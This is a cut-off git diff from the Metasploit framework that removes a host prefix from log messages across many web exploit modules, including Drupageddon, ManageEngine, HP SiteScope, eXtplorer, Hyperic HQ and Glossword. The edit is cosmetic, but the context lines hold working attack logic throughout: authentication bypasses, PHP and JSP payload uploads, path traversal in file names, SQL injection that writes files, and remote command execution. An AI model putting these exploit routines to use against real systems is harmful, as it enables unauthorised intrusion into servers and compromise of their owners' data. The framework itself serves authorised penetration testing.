b/modules/exploits/multi/http/drupal_drupageddon.rb @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote md5_base64 = phpass_encode64(md5, md5.length) md5_stripped = md5_base64[0...22] pass = "$P\\$" + iter_char + salt + md5_stripped - vprint_status("#{peer} - password hash: #{pass}") + vprint_status("password hash: #{pass}") return pass end @@ -129,8 +129,8 @@ class Metasploit3 < Msf::Exploit::Remote form_build_id = $1 if content =~ /name="form_build_id" value="(.+?)"/ form_token = $1 if content =~ /name="form_token" value="(.+?)"/ - vprint_status("#{peer} - form_build_id: #{form_build_id}") - vprint_status("#{peer} - form_token: #{form_token}") + vprint_status("form_build_id: #{form_build_id}") + vprint_status("form_token: #{form_token}") return form_build_id, form_token end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote # TODO: Check if option admin_role exists via admin/people/permissions/roles # call login page to extract tokens - print_status("#{peer} - Testing page") + print_status("Testing page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote 'op' => 'Log in' } - print_status("#{peer} - Creating new user #{user}:#{pass}") + print_status("Creating new user #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote end # login - print_status("#{peer} - Logging in as #{user}:#{pass}") + print_status("Logging in as #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -202,10 +202,10 @@ class Metasploit3 < Msf::Exploit::Remote end cookie = res.get_cookies - vprint_status("#{peer} - cookie: #{cookie}") + vprint_status("cookie: #{cookie}") # call admin interface to extract CSRF token and enabled modules - print_status("#{peer} - Trying to parse enabled modules") + print_status("Trying to parse enabled modules") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end # enable PHP filter - print_status("#{peer} - Enabling the PHP filter module") + print_status("Enabling the PHP filter module") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Response: http 302, Location: http://10.211.55.50/?q=admin/modules - print_status("#{peer} - Setting permissions for PHP filter module") + print_status("Setting permissions for PHP filter module") # allow admin to use php_code res = send_request_cgi({ @@ -280,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote # get administrator role id id = $1 if res.body =~ /for="edit-([0-9]+)-administer-content-types">#{admin_role}:/ - vprint_status("#{peer} - admin role id: #{id}") + vprint_status("admin role id: #{id}") unless id fail_with(Failure::Unknown, "Could not parse out administrator ID") @@ -313,7 +313,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Add new Content page (extract csrf token) - print_status("#{peer} - Getting tokens from create new article page") + print_status("Getting tokens from create new article page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -342,7 +342,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('1', nil, nil, 'form-data; name="promote"') post_data = data.to_s - print_status("#{peer} - Calling preview page. Exploit should trigger...") + print_status("Calling preview page. Exploit should trigger...") send_request_cgi( 'method' => 'POST', 'uri' => uri_path, diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index 0f1d3770c3..eda04d55c3 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_payload - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ 'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")), @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body.empty? if is_payload - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end register_files_for_cleanup(target_path.gsub("../../", "../")) return true @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Determining target") + print_status("Determining target") version = get_version @@ -308,7 +308,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") + print_status("Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") sleep(datastore['SLEEP']) return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4))) end @@ -322,10 +322,10 @@ class Metasploit3 < Msf::Exploit::Remote @my_target = pick_target if @my_target.nil? - print_error("#{peer} - Unable to select a target, we must bail.") + print_error("Unable to select a target, we must bail.") return else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end if @my_target == targets[1] @@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote exploit_path = exploit_native end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(exploit_path), 'method' => 'GET' diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 1289010cbd..542509bd28 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -141,16 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";" # bypass auth - print_status("#{peer} - Authenticating as user (#{user})") + print_status("Authenticating as user (#{user})") res = auth_bypass(base, user) if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # search for writable directories - print_status("#{peer} - Retrieving writable subdirectories") + print_status("Retrieving writable subdirectories") begin res = send_request_cgi({ 'method' => 'POST', @@ -163,19 +163,19 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ dir = "#{base}#{$1}" - print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})") + print_status("Successfully retrieved writable subdirectory (#{$1})") else dir = "#{base}" - print_error("#{peer} - Could not find a writable subdirectory.") + print_error("Could not find a writable subdirectory.") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, dir, @fname, php) if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote end # search directories in the web root for the file - print_status("#{peer} - Searching directories for file (#{@fname})") + print_status("Searching directories for file (#{@fname})") begin res = send_request_cgi({ 'method' => 'POST', @@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ dir = $1.gsub('\\','') - print_good("#{peer} - Successfully found file") + print_good("Successfully found file") else - print_error("#{peer} - Failed to find file") + print_error("Failed to find file") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (/#{dir}/#{@fname})") + print_status("Executing payload (/#{dir}/#{@fname})") begin send_request_cgi({ 'method' => 'GET', @@ -213,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Connection failed") end if res and res.code != 200 - print_error("#{peer} - Executing payload failed") + print_error("Executing payload failed") end end end diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 0aa285ac06..a829e464cc 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -54,21 +54,21 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = login(base, user, pass) if res if res.code == 200 - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Unknown elsif res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ - vprint_good("#{peer} - Authenticated successfully") + vprint_good("Authenticated successfully") return Exploit::CheckCode::Appears end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Safe @@ -128,23 +128,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login; get session id and token - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = login(base, user, pass) if res and res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ token = "#{$1}" sid = "#{$2}" - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, sid, @fname, php) if res and res.code == 301 and res['location'] =~ /Setting saved/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve PHP file path - print_status("#{peer} - Locating PHP payload file") + print_status("Locating PHP payload file") begin res = send_request_cgi({ 'method' => 'GET', @@ -166,13 +166,13 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/ shell_uri = "#{$1}" @fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)') - print_good("#{peer} - Found payload file path (#{shell_uri})") + print_good("Found payload file path (#{shell_uri})") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{shell_uri})") + print_status("Executing payload (#{shell_uri})") begin send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb index f8e6b61147..e27433b5a2 100644 --- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -93,11 +93,11 @@ class Metasploit3 < Msf::Exploit::Remote def exploit if target.name =~ /Windows/ - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # cmd.exe max length is 8192 execute_cmdstager({:linemax => 8000, :nodelete => true}) elsif target.name =~ /Linux/ - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_command(payload.encoded, {:http_timeout => 1}) end end diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 7c5029cbf6..aa418720b9 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -88,15 +88,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' # Create user with empty credentials - print_status("#{peer} - Creating user with empty credentials") + print_status("Creating user with empty credentials") if create_user.nil? - print_error("#{peer} - Failed to create user") + print_error("Failed to create user") return end # Generate an initial JSESSIONID - print_status("#{peer} - Retrieving an initial JSESSIONID") + print_status("Retrieving an initial JSESSIONID") res = send_request_cgi( 'uri' => normalize_uri(@uri, 'servlet/Main'), 'method' => 'POST' @@ -105,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 else - print_error("#{peer} - Retrieve of initial JSESSIONID failed") + print_error("Retrieve of initial JSESSIONID failed") return end # Authenticate login_data = "j_username=&j_password=" - print_status("#{peer} - Authenticating on HP SiteScope Configuration") + print_status("Authenticating on HP SiteScope Configuration") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'j_security_check'), @@ -129,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote session_id = $1 redirect = URI(res.headers['Location']).path else - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end # Follow redirection to complete authentication process - print_status("#{peer} - Following redirection to finish authentication") + print_status("Following redirection to finish authentication") res = send_request_cgi( { 'uri' => redirect, @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote traversal = "..\\..\\..\\..\\..\\..\\" end - print_status("#{peer} - Uploading the payload") + print_status("Uploading the payload") res = send_request_cgi( { 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true", @@ -249,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - Payload successfully uploaded to #{path}") + print_good("Payload successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the Payload") + print_error("Error uploading the Payload") return end post_data = Rex::MIME::Message.new post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"") - print_status("#{peer} - Uploading the JSP") + print_status("Uploading the JSP") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", @@ -273,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - JSP successfully uploaded to #{path}") + print_good("JSP successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the JSP") + print_error("Error uploading the JSP") return end diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 9503af4d02..25f76c5668 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -81,12 +81,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_command(cmd) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.code == 200 && res.body =~ /#{sig}/ - vprint_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'") + vprint_good("Running with user '#{res.body.split(sig)[1].strip}'") return Exploit::CheckCode::Vulnerable end @@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote if @cookie.empty? fail_with(Failure::NoAccess, "#{peer} - Login failed") else - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") + print_good("Logged in as '#{datastore['USERNAME']}'") end end diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 6deb124231..329b8ee316 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -94,12 +94,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_warning("#{peer} - Could not access the script console") + print_warning("Could not access the script console") end if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") end end @@ -113,12 +113,12 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - vprint_status("#{peer} - Authenticating as '#{user}'") + vprint_status("Authenticating as '#{user}'") res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - vprint_good("#{peer} - Authenticated successfully as '#{user}'") + vprint_good("Authenticated successfully as '#{user}'") # check access to the console - vprint_status("#{peer} - Checking access to the script console") + vprint_status("Checking access to the script console") get_nonce if @nonce.nil? return Exploit::CheckCode::Detected @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Appears end elsif res.headers.include?('X-Jenkins') or res.headers['location'] =~ /authfailed/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(client) if not @to_delete.nil? - print_warning("#{peer} - Deleting #{@to_delete} payload file") + print_warning("Deleting #{@to_delete} payload file") execute_command("rm #{@to_delete}") end end @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res and res.code == 200 and res.body =~ /Executed/ - vprint_good("#{peer} - Command executed successfully") + vprint_good("Command executed successfully") else fail_with(Failure::Unknown, "#{peer} - Failed to execute the command.") end # version 4.6.6 returns a new CSRF nonce in the response if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") # version 4.5.2 does not, so we request a new one else get_nonce @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") http_send_command(java_craft_runtime_exec(cmd)) end @@ -258,23 +258,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - print_good("#{peer} - Authenticated successfully as '#{user}'") + print_good("Authenticated successfully as '#{user}'") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # check access to the console and get CSRF nonce - print_status("#{peer} - Checking access to the script console") + print_status("Checking access to the script console") get_nonce # check operating system if target.name =~ /Automatic/ - print_status("#{peer} - Trying to detect the remote target...") + print_status("Trying to detect the remote target...") @my_target = get_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to detect the remote target") else - print_good("#{peer} - #{@my_target.name} target found") + print_good("#{@my_target.name} target found") end else @my_target = target @@ -283,10 +283,10 @@ class Metasploit3 < Msf::Exploit::Remote # send payload case @my_target['Platform'] when 'win' - print_status("#{peer} - Sending command stager...") + print_status("Sending command stager...") execute_cmdstager({:linemax => 2049}) when 'unix' - print_status("#{peer} - Sending UNIX payload...") + print_status("Sending UNIX payload...") http_send_command(java_craft_runtime_exec(payload.encoded)) when 'linux' print_status("#{rhost}:#{rport} - Sending Linux stager...") diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index ec577eb1d3..3f550c6497 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -104,12 +104,12 @@ class Metasploit3 < Msf::Exploit::Remote @fname = rand_text_numeric(7) # upload PHP payload to userpictures/[fname].php - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php) if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)") + print_status("Executing payload (userpictures/#{@fname}.php)") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 5360e33007..3e7f142d56 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb @@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>| - print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)") + print_status("Sending PHP payload (#{php.length.to_s} bytes)") send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"), 'data' => php }) - print_status("#{peer} - Requesting data.php") + print_status("Requesting data.php") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php') diff --git a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb index 35b1b39b40..71b8f3c04e 100644 --- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb +++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Automatic targeting failed.") else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end # When using auto targeting, MSF selects the Windows meterpreter as the default payload. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote inject_exec(fullpath) register_file_for_cleanup(fullpath.sub('../','')) - print_status("#{peer} - Requesting #{jsp_name}") + print_status("Requesting #{jsp_name}") send_request_raw({'uri' => normalize_uri(jsp_name)}) end @@ -303,7 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Selecting target, this might take a few seconds...") + print_status("Selecting target, this might take a few seconds...") rand_txt = rand_text_alpha_lower(8) << ".txt" paths = db_paths @@ -488,7 +488,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - print_status("#{peer} - Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") + print_status("Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") if @my_target['Database'] == 'postgresql' inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'") @@ -528,12 +528,12 @@ class Metasploit3 < Msf::Exploit::Remote if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 if ver_gt(build, '80200') - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else - print_status("#{peer} - Detected Desktop Central v8 #{build} (MySQL)") + print_status("Detected Desktop Central v8 #{build} (MySQL)") end else - print_status("#{peer} - Detected Desktop Central v8 (MySQL)") + print_status("Detected Desktop Central v8 (MySQL)") end # DC v8 < 80200 uses the MySQL database Exploit::CheckCode::Appears @@ -542,7 +542,7 @@ class Metasploit3 < Msf::Exploit::Remote def check_desktop_central_9(body) if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 - print_status("#{peer} - Detected Desktop Central v9 #{build}") + print_status("Detected Desktop Central v9 #{build}") if ver_lt(build, '90039') return Exploit::CheckCode::Appears else @@ -565,7 +565,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 uses the MySQL database - print_status("#{peer} - Detected Desktop Central v7 (MySQL)") + print_status("Detected Desktop Central v7 (MySQL)") return Exploit::CheckCode::Appears elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ @@ -600,17 +600,17 @@ class Metasploit3 < Msf::Exploit::Remote if ver_lt_eq(build, '6500') # if it's a build below 6500, it will only work if we have a JSP compiler - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") + print_status("Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") return Exploit::CheckCode::Detected elsif ver_lt(build, '6800') # PMP v6 < 6800 uses the MySQL database - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (MySQL)") + print_status("Detected Password Manager Pro v6 #{build} (MySQL)") return Exploit::CheckCode::Appears elsif ver_lt(build, '7003') - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") return Exploit::CheckCode::Appears else - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") Exploit::CheckCode::Safe end end diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index ea739f7e8f..7ea5105ad1 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -365,9 +365,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable") end - print_status("#{peer} - Selecting target...") + print_status("Selecting target...") @my_target = pick_target - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") if @my_target == targets[3] cookie = login_it360 @@ -402,7 +402,7 @@ class Metasploit3 < Msf::Exploit::Remote # Linux doesn't like it when we traverse non existing directories, # so let's create them by sending some random data before the EAR. # (IT360 does not have a Linux version so we skip the bogus file for it) - print_status("#{peer} - Uploading bogus file...") + print_status("Uploading bogus file...") res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4))) if res && res.code != 200 fail_with(Failure::Unknown, "#{peer} - Bogus file upload failed") @@ -410,10 +410,10 @@ class Metasploit3 < Msf::Exploit::Remote end # Now send the actual payload - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_multipart_request(cookie, ear_file_name, ear_file.pack) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else fail_with(Failure::Unknown, "#{peer} - EAR upload failed") end @@ -422,7 +422,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/manageengine_sd_uploader.rb b/modules/exploits/multi/http/manageengine_sd_uploader.rb index db8164c450..5b8c04f0ce 100644 --- a/modules/exploits/multi/http/manageengine_sd_uploader.rb +++ b/modules/exploits/multi/http/manageengine_sd_uploader.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") register_files_for_cleanup(jboss_path.gsub('../../','../') + "/null/" + ear_file_name) register_files_for_cleanup("Attachments/null/" + rand_file) diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb index 75c7502c84..55a33c3fe7 100644 --- a/modules/exploits/multi/http/mma_backdoor_upload.rb +++ b/modules/exploits/multi/http/mma_backdoor_upload.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) payload_name = "#{rand_text_alpha(5)}.php" - print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor") + print_status("Trying to upload #{payload_name} to mma.php Backdoor") data = Rex::MIME::Message.new @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.body =~ /uplod d0n3 in SAME file/ - print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...") + print_good("Our payload #{payload_name} has been uploaded. Calling payload...") register_files_for_cleanup(payload_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index 1882bd0b24..d58161de13 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ 